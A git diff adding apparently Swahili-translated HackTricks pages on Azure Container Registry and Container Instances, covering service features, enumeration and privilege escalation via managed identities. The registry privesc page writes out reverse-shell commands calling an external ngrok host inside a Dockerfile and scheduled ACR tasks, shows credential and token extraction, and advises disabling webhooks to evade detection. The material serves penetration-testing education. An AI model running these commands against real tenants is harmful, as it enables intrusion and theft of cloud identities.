diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index e3e18e17d..7ab73713c 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -408,6 +408,8 @@
     - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
     - [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
     - [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md)
+    - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md)
+    - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-instances.md)
     - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md)
     - [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md)
     - [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md)
@@ -445,7 +447,7 @@
     - [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md)
   - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
     - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
-    - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB-post-exploitation.md)
+    - [Az - CosmosDB](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
     - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
     - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
     - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
@@ -460,14 +462,16 @@
     - [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
     - [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
     - [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
-    - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB-privesc.md)
+    - [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-services/az-container-registry-privesc.md)
+    - [Az - Container Instances Privesc](pentesting-cloud/azure-security/az-services/az-container-instances-privesc.md)
+    - [Az - CosmosDB Privesc](pentesting-cloud/azure-security/az-services/az-cosmosDB-privesc.md)
     - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md)
       - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
       - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
     - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md)
     - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
-    - [Az - MySQL](pentesting-cloud/azure-security/az-services/az-mysql-privesc.md)
-    - [Az - PostgreSQL](pentesting-cloud/azure-security/az-services/az-postgresql-privesc.md)
+    - [Az - MySQL Privesc](pentesting-cloud/azure-security/az-services/az-mysql-privesc.md)
+    - [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-services/az-postgresql-privesc.md)
     - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
     - [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md)
     - [Az - Static Web App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md)
diff --git a/src/images/registry_roles.png b/src/images/registry_roles.png
new file mode 100644
index 000000000..f1d4a3615
Binary files /dev/null and b/src/images/registry_roles.png differ
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md
new file mode 100644
index 000000000..14c2160b2
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md
@@ -0,0 +1,64 @@
+# Az - Azure Container Instances Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Azure Container Instances
+
+Kwa maelezo zaidi angalia:
+
+{{#ref}}
+../az-services/az-container-instances.md
+{{#endref}}
+
+### `Microsoft.ContainerInstance/containerGroups/read`, `Microsoft.ContainerInstance/containerGroups/containers/exec/action`
+
+Hizi ruhusa zinamruhusu mtumiaji **kutekeleza amri** katika kontena linalofanya kazi. Hii inaweza kutumika **kuinua mamlaka** katika kontena ikiwa ina kitambulisho chochote kinachosimamiwa kilichounganishwa. Bila shaka, pia inawezekana kufikia msimbo wa chanzo na taarifa nyingine yoyote nyeti iliyohifadhiwa ndani ya kontena.
+
+Ili kutekeleza `ls` na kupata matokeo ni rahisi kama:
+```bash
+az container exec --name <container-name> --resource-group <res-group>  --exec-command 'ls'
+```
+Ni pia inawezekana **kusoma matokeo** ya kontena kwa:
+```bash
+az container attach --name <container-name> --resource-group <res-group>
+```
+Au pata rekodi za:
+```bash
+az container logs --name <container-name> --resource-group <res-group>
+```
+### `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
+
+Hizi ruhusa zinaruhusu **kuunganisha utambulisho wa mtumiaji ulioendeshwa** kwa kundi la kontena. Hii ni muhimu sana kuongeza mamlaka katika kontena.
+
+Ili kuunganisha utambulisho wa mtumiaji ulioendeshwa kwa kundi la kontena:
+```bash
+az rest \
+--method PATCH \
+--url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerInstance/containerGroups/<container-name>?api-version=2021-09-01" \
+--body '{
+"identity": {
+"type": "UserAssigned",
+"userAssignedIdentities": {
+"/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>": {}
+}
+}
+}' \
+--headers "Content-Type=application/json"
+```
+### `Microsoft.Resources/subscriptions/resourcegroups/read`, `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
+
+Hizi ruhusa zinaruhusu **kuunda au kusasisha kundi la kontena** lenye **utambulisho wa mtumiaji uliopewa usimamizi** ulioambatanishwa nalo. Hii ni muhimu sana katika kupandisha mamlaka ndani ya kontena.
+```bash
+az container create \
+--resource-group <res-group>> \
+--name nginx2 \
+--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
+--assign-identity "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>" \
+--restart-policy OnFailure \
+--os-type Linux \
+--cpu 1 \
+--memory 1.0
+```
+Zaidi ya hayo, inawezekana pia kuboresha kundi la kontena lililopo kwa kuongeza kwa mfano **`--command-line` argument** yenye shell ya kurudi. 
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md
new file mode 100644
index 000000000..092632804
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md
@@ -0,0 +1,115 @@
+# Az - Azure Container Registry Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Azure Container Registry
+
+Kwa maelezo zaidi angalia:
+
+{{#ref}}
+../az-services/az-container-registry.md
+{{#endref}}
+
+### `Microsoft.ContainerRegistry/registries/listCredentials/action`
+
+Ruhusa hii inamruhusu mtumiaji kuorodhesha akiba za usimamizi za ACR. Hii ni muhimu ili **kupata ufikiaji kamili** juu ya akiba
+```bash
+az rest --method POST \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>/listCredentials?api-version=2023-11-01-preview"
+```
+Ikiwa haki za msimamizi hazijawashwa, utahitaji pia ruhusa `Microsoft.ContainerRegistry/registries/write` ili kuziwasha kwa:
+```bash
+az rest --method PATCH --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>?api-version=2023-11-01-preview" --body '{"properties": {"adminUserEnabled": true}}'
+```
+### `Microsoft.ContainerRegistry/registries/tokens/write`, `Microsoft.ContainerRegistry/registries/generateCredentials/action`
+
+Hizi ruhusa zinamruhusu mtumiaji **kuunda token mpya** yenye nywila za kufikia rejista.
+
+Ili kutumia `az cli` kuunda kama katika mfano ufuatao, utahitaji pia ruhusa `Microsoft.ContainerRegistry/registries/read`, `Microsoft.ContainerRegistry/registries/scopeMaps/read`, `Microsoft.ContainerRegistry/registries/tokens/operationStatuses/read`, `Microsoft.ContainerRegistry/registries/tokens/read`
+```bash
+az acr token create \
+--registry <registry-name> \
+--name <token-name> \
+--scope-map _repositories_admin
+```
+### `Microsoft.ContainerRegistry/registries/listBuildSourceUploadUrl/action`, `Microsoft.ContainerRegistry/registries/scheduleRun/action`, `Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action`
+
+Hizi ruhusa zinamruhusu mtumiaji **kujenga na kuendesha picha** katika rejista. Hii inaweza kutumika **kutekeleza msimbo** katika kontena.
+
+>[!WARNING]
+> Hata hivyo, picha itatekelezwa katika **mazingira yaliyofungwa** na **bila ufikiaji wa huduma ya metadata**. Hii inamaanisha kwamba kontena haitaweza kupata **metadata ya mfano** hivyo hii si ya manufaa sana katika kupandisha mamlaka.
+```bash
+# Build
+echo 'FROM ubuntu:latest\nRUN bash -c "bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/17585 0>&1"\nCMD ["/bin/bash", "-c", "bash -i >& /dev/tcp//2.tcp.eu.ngrok.io/17585 0>&1"]' > Dockerfile
+az acr run --registry 12345TestingRegistry --cmd '$Registry/rev/shell:v1:v1' /dev/null
+```
+### `Microsoft.ContainerRegistry/registries/tasks/write`
+
+Hii ni ruhusa kuu inayoruhusu kuunda na kusasisha kazi katika rejista. Hii inaweza kutumika **kutekeleza msimbo ndani ya kontena lenye utambulisho uliohifadhiwa** ndani yake.
+
+Hii ni mfano wa jinsi ya kutekeleza shell ya reverse katika kontena lenye utambulisho wa **system managed** uliohifadhiwa ndani yake:
+```bash
+az acr task create \
+--registry <registry-name> \
+--name reverse-shell-task \
+--image rev/shell:v1 \
+--file ./Dockerfile \
+--context https://github.com/carlospolop/Docker-rev.git \
+--assign-identity \
+--commit-trigger-enabled false \
+--schedule "*/1 * * * *"
+```
+Njia nyingine ya kupata RCE kutoka kwa kazi bila kutumia hifadhi ya nje ni kutumia amri `az acr task create` pamoja na bendera `--cmd`. Hii itakuruhusu kuendesha amri ndani ya kontena. Kwa mfano, unaweza kuendesha shell ya kurudi kwa amri ifuatayo:
+```bash
+az acr task create \
+--registry <registry-name> \
+--name reverse-shell-task-cmd \
+--image rev/shell2:v1 \
+--cmd 'bash -c "bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/15508 0>&1"' \
+--schedule "*/1 * * * *" \
+--context /dev/null \
+--commit-trigger-enabled false \
+--assign-identity
+```
+> [!TIP]
+> Kumbuka kwamba ili kupewa kitambulisho kinachosimamiwa na mfumo hauhitaji ruhusa maalum, ingawa inapaswa kuwa imewezeshwa kabla katika rejista na kupewa ruhusa fulani ili iwe na manufaa.
+
+Ili kupewa **kitambulisho kinachosimamiwa na mtumiaji pia** unahitaji ruhusa `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` kufanya:
+```bash
+az acr task create \
+--registry <registry-name> \
+--name reverse-shell-task \
+--image rev/shell:v1 \
+--file ./Dockerfile \
+--context https://github.com/carlospolop/Docker-rev.git \
+--assign-identity \[system\] "/subscriptions/<subscription-id>>/resourcegroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>" \
+--commit-trigger-enabled false \
+--schedule "*/1 * * * *"
+```
+Ili **kusasisha** repo ya kazi iliyopo unaweza kufanya:
+```bash
+az acr task update \
+--registry <registry-name> \
+--name reverse-shell-task \
+--context https://github.com/your-user/your-repo.git
+```
+### `Microsoft.ContainerRegistry/registries/importImage/action`
+
+Kwa ruhusa hii inawezekana **kuagiza picha kwenye azure registry**, hata bila kuwa na picha hiyo kwenye kifaa. Hata hivyo, kumbuka kwamba **huwezi kuagiza picha yenye lebo** ambayo tayari ipo kwenye registry.
+```bash
+# Push with az cli
+az acr import \
+--name <registry-name> \
+--source mcr.microsoft.com/acr/connected-registry:0.8.0 # Example of a repo to import
+```
+Ili **kuondoa au kufuta lebo maalum ya picha** kutoka kwenye rejista unaweza kutumia amri ifuatayo. Hata hivyo, kumbuka kwamba utahitaji mtumiaji au token yenye **idhini ya kutosha** kufanya hivyo:
+```bash
+az acr repository untag \
+--name <registry-name> \
+--image <image-name>:<tag>
+
+az acr repository delete \
+--name <registry-name> \
+--image <image-name>:<tag>
+```
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-instances.md b/src/pentesting-cloud/azure-security/az-services/az-container-instances.md
new file mode 100644
index 000000000..19e96ef06
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-container-instances.md
@@ -0,0 +1,45 @@
+# Az - Container Instances
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Azure Container Instances (ACI) hutoa njia **isiyo na seva, ya mahitaji** ya kuendesha **containers** katika wingu la Azure. Unaweza **kupeleka** container moja au nyingi katika kundi lenye **hesabu inayoweza kupanuka**, **chaguzi za mtandao**, na ufanisi wa kuungana na **huduma nyingine za Azure** (kama Hifadhi, Mitandao ya Kijadi, au Rejista za Container).
+
+Kwa kuwa ni **kazi za muda mfupi**, huhitaji kusimamia miundombinu ya VM inayotumika — Azure inashughulikia hiyo kwa ajili yako. Hata hivyo, kutoka kwa **mtazamo wa usalama wa mashambulizi**, ni muhimu kuelewa jinsi **idhini**, **vitambulisho**, **mipangilio ya mtandao**, na **kumbukumbu** zinaweza kufichua maeneo ya shambulio na uwezekano wa mipangilio isiyo sahihi.
+
+### Configurations
+
+- Ili kuunda container, inawezekana kutumia picha ya umma, picha ya container kutoka kwa Azure Container Registry au hifadhi ya nje, ambayo inaweza **kuhitaji kusanidi nenosiri** ili kuipata.
+- Kuhusu mtandao, inaweza pia kuwa na **IP ya umma** au kuwa **mipangilio ya kibinafsi**.
+- Pia inawezekana kusanidi mipangilio ya kawaida ya docker kama:
+- **Mabadiliko ya mazingira**
+- **Vikundi** (hata kutoka Azure Files)
+- **Bandari**
+- **Mipaka ya CPU na kumbukumbu**
+- **Sera ya kurejesha**
+- **Kimbia kama mwenye mamlaka**
+- **Amri ya kuendesha**
+- ...
+
+## Enumeration
+
+> [!WARNING]
+> Unapokuwa unafanya orodha ya ACI, unaweza kufichua mipangilio nyeti kama **mabadiliko ya mazingira**, **maelezo ya mtandao**, au **vitambulisho vilivyodhibitiwa**. Kuwa makini na kuandika au kuonyesha hizo.
+```bash
+# List all container instances in the subscription
+az container list
+
+# Show detailed information about a specific container instance
+az container show --name <container-name> --resource-group <res-group>
+
+# Fetch logs from a container
+az container logs --name <container-name> --resource-group <res-group>
+
+# Execute a command in a running container and get the output
+az container exec --name <container-name> --resource-group <res-group> --exec-command "ls"
+
+# Get yaml configuration of the container group
+az container export  --name <container-name> --resource-group <res-group>
+```
+
diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-registry.md b/src/pentesting-cloud/azure-security/az-services/az-container-registry.md
new file mode 100644
index 000000000..eb7128b60
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-container-registry.md
@@ -0,0 +1,157 @@
+# Az - Container Registry
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Azure Container Registry (ACR) ni rejista salama, ya kibinafsi inayokuruhusu **hifadhi, kusimamia, na kufikia picha za kontena katika wingu la Azure**. Inajumuisha kwa urahisi na huduma kadhaa za Azure, ikitoa michakato ya kujenga na kutekeleza kiotomatiki kwa kiwango. Pamoja na vipengele kama geo-replication na uchambuzi wa udhaifu, ACR husaidia kuhakikisha usalama wa kiwango cha biashara na kufuata kanuni kwa programu zilizowekwa kwenye kontena.
+
+### Permissions
+
+Hizi ni **idhini tofauti** [kulingana na nyaraka](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager) ambazo zinaweza kutolewa juu ya Rejista ya Kontena:
+
+- Upatikanaji wa Meneja wa Rasilimali
+- Kuunda/kufuta rejista
+- Kusukuma picha
+- Kuvuta picha
+- Kufuta data ya picha
+- Kubadilisha sera
+- Kusaini picha
+
+Pia kuna **majukumu yaliyojengwa ndani** ambayo yanaweza kutolewa, na pia inawezekana kuunda **majukumu ya kawaida**.
+
+![](</images/registry_roles.png>)
+
+### Authentication
+
+> [!WARNING]
+> Ni muhimu sana kwamba hata kama jina la rejista lina herufi kubwa, unapaswa kila wakati kutumia **herufi ndogo** kuingia, kusukuma na kuvuta picha.
+
+Kuna njia 4 za kuthibitisha kwenye ACR:
+
+- **Kwa Entra ID**: Hii ndiyo **njia ya kawaida** ya kuthibitisha kwenye ACR. Inatumia amri ya **`az acr login`** kuthibitisha kwenye ACR. Amri hii itahifadhi **tahadhari** katika faili ya **`~/.docker/config.json`**. Zaidi ya hayo, ikiwa unakimbia amri hii kutoka kwenye mazingira yasiyo na upatikanaji wa socket ya docker kama katika **cloud shell**, inawezekana kutumia bendera ya **`--expose-token`** kupata **token** ya kuthibitisha kwenye ACR. Kisha ili kuthibitisha unahitaji kutumia kama jina la mtumiaji `00000000-0000-0000-0000-000000000000` kama: `docker login myregistry.azurecr.io --username 00000000-0000-0000-0000-000000000000 --password-stdin <<< $TOKEN`
+- **Kwa akaunti ya admin**: Mtumiaji wa admin amezuiliwa kwa kawaida lakini anaweza kuwezeshwa na kisha itakuwa inawezekana kufikia rejista kwa **jina la mtumiaji** na **nenosiri** la akaunti ya admin lenye ruhusa kamili kwa rejista. Hii bado inaungwa mkono kwa sababu huduma zingine za Azure zinazitumia. Kumbuka kwamba **nenosiri 2** zinaundwa kwa mtumiaji huyu na zote ni halali. Unaweza kuziwezesha kwa `az acr update -n <acrName> --admin-enabled true`. Kumbuka kwamba jina la mtumiaji kwa kawaida ni jina la rejista (na si `admin`).
+- **Kwa token**: Inawezekana kuunda **token** yenye **`scope map`** maalum (idhini) ili kufikia rejista. Kisha, inawezekana kutumia jina la token hii kama jina la mtumiaji na baadhi ya nenosiri zilizozalishwa kuthibitisha kwenye rejista kwa `docker login -u <registry-name> -p <password> aregistry-url>`
+- **Kwa Msingi wa Huduma**: Inawezekana kuunda **msingi wa huduma** na kutoa jukumu kama **`AcrPull`** ili kuvuta picha. Kisha, itakuwa inawezekana **kuingia kwenye rejista** kwa kutumia appId ya SP kama jina la mtumiaji na siri iliyozalishwa kama nenosiri.
+
+Mfano wa skripti kutoka kwa [nyaraka](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-auth-service-principal) za kuunda SP yenye upatikanaji juu ya rejista:
+```bash
+#!/bin/bash
+ACR_NAME=$containerRegistry
+SERVICE_PRINCIPAL_NAME=$servicePrincipal
+
+# Obtain the full registry ID
+ACR_REGISTRY_ID=$(az acr show --name $ACR_NAME --query "id" --output tsv)
+
+PASSWORD=$(az ad sp create-for-rbac --name $SERVICE_PRINCIPAL_NAME --scopes $ACR_REGISTRY_ID --role acrpull --query "password" --output tsv)
+USER_NAME=$(az ad sp list --display-name $SERVICE_PRINCIPAL_NAME --query "[].appId" --output tsv)
+
+echo "Service principal ID: $USER_NAME"
+echo "Service principal password: $PASSWORD"
+```
+### Encryption
+
+Ni **Premium SKU** pekee inayounga mkono **encryption at rest** kwa picha na vitu vingine.
+
+### Networking
+
+Ni **Premium SKU** pekee inayounga mkono **private endpoints**. Nyingine zinasaidia tu **public access**. Endpoint ya umma ina muundo `<registry-name>.azurecr.io` na endpoint ya kibinafsi ina muundo `<registry-name>.privatelink.azurecr.io`. Kwa sababu hii, jina la registry lazima liwe la kipekee katika Azure yote.
+
+### Microsoft Defender for Cloud
+
+Hii inakuwezesha **scan the images** katika registry kwa **vulnerabilities**.
+
+### Soft-delete
+
+Kipengele cha **soft-delete** kinakuwezesha **recover a deleted registry** ndani ya idadi iliyotajwa ya siku. Kipengele hiki **kimezimwa kwa default**.
+
+### Webhooks
+
+Inawezekana **create webhooks** ndani ya registries. Katika webhook hii inahitajika kubainisha URL ambapo **request itatumwa kila wakati hatua ya push au delete inafanywa**. Aidha, Webhooks zinaweza kuashiria scope kuonyesha repositories (picha) ambazo zitakathiriwa. Kwa mfano, 'foo:*' inamaanisha matukio chini ya repository 'foo'.
+
+Kutoka kwa mtazamo wa washambuliaji, ni muhimu kuangalia hii **kabla ya kufanya hatua yoyote** katika registry, na kuondoa kwa muda ikiwa inahitajika, ili kuepuka kugunduliwa.
+
+### Connected registries
+
+Hii kimsingi inaruhusu **mirror the images** kutoka registry moja hadi nyingine, kwa kawaida iliyoko kwenye eneo.
+
+Ina modes 2: **ReadOnly** na **ReadWrite**. Katika ya kwanza, picha zinachukuliwa tu **pulled** kutoka registry ya chanzo, na katika ya pili, picha zinaweza pia **pushed** kwa registry ya chanzo.
+
+Ili wateja waweze kufikia registry kutoka Azure, **token** inatengenezwa wakati registry iliyounganishwa inatumika.
+
+### Runs & Tasks
+
+Runs & Tasks inaruhusu kutekeleza katika Azure hatua zinazohusiana na kontena ambazo kawaida unahitaji kufanya kwa ndani au katika pipeline ya CI/CD. Kwa mfano, unaweza **build, push, and run images in the registry**.
+
+Njia rahisi ya kujenga na kuendesha kontena ni kutumia Run ya kawaida:
+```bash
+# Build
+echo "FROM mcr.microsoft.com/hello-world" > Dockerfile
+az acr build --image sample/hello-world:v1 --registry mycontainerregistry008 --file Dockerfile .
+
+# Run
+az acr run --registry mycontainerregistry008 --cmd '$Registry/sample/hello-world:v1' /dev/null
+```
+Hata hivyo, hiyo itasababisha kukimbia ambazo si za kuvutia sana kutoka kwa mtazamo wa mshambuliaji kwa sababu hazina utambulisho wa usimamizi ulioambatanishwa nao.
+
+Hata hivyo, **tasks** zinaweza kuwa na **system and user managed identity** iliyounganishwa nazo. Tasks hizi ndizo zinazofaa kwa **escalate privileges** katika kontena. Katika sehemu ya kupandisha mamlaka, inawezekana kuona jinsi ya kutumia tasks kupandisha mamlaka.
+
+### Cache
+
+Kipengele cha cache kinaruhusu **download images from an external repository** na kuhifadhi toleo jipya katika rejista. Inahitaji kuwa na **credentials configured** kwa kuchagua akreditivu kutoka Azure Vault.
+
+Hii ni ya kuvutia sana kutoka kwa mtazamo wa mshambuliaji kwa sababu inaruhusu **pivot to an external platform** ikiwa mshambuliaji ana ruhusa ya kutosha kufikia akreditivu, **download images from an external repository** na kuunda cache pia inaweza kutumika kama **persistence mechanism**.
+
+## Enumeration
+
+> [!WARNING]
+> Ni muhimu sana kwamba hata kama jina la rejista lina herufi kubwa, unapaswa kutumia herufi ndogo tu katika url ili kufikia hiyo.
+```bash
+# List of all the registries
+# Check the network, managed identities, adminUserEnabled, softDeletePolicy, url...
+az acr list
+
+# Get the details of a registry
+az acr show --name <registry-name>
+
+# List tokens of a registry
+az acr token list --registry <registry-name> --resource-group <res-group>
+
+# List repositories in a registry
+az acr repository list --name <registry-name> --resource-group <res-group>
+
+# List the tags of a repository
+az acr repository show-tags --repository <repository-name> --name <registry-name> --resource-group <res-group>
+
+# List deleted repository tags
+## At the time of this writing there isn't yet any command to restore it
+az acr repository list-deleted --name <registry-name>
+
+# List tasks
+## Check the git URL or the command
+az acr task list --registry <registry-name>
+
+# List tasks runs
+az acr task list-runs --registry <registry-name>
+
+# List connected registries
+az acr connected-registry list --registry <registry-name>
+
+# List cache
+az acr cache list --registry <registry-name>
+
+# Get cache details
+az acr cache show --name <cache-name> --registry <registry-name>
+```
+## Kuinua Haki & Baada ya Utekelezaji
+
+{{#ref}}
+../az-privilege-escalation/az-automation-accounts-privesc.md
+{{#endref}}
+
+## Marejeleo
+
+- [https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication?tabs=azure-cli](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication?tabs=azure-cli)
+- [https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager)
+
+{{#include ../../../../banners/hacktricks-training.md}}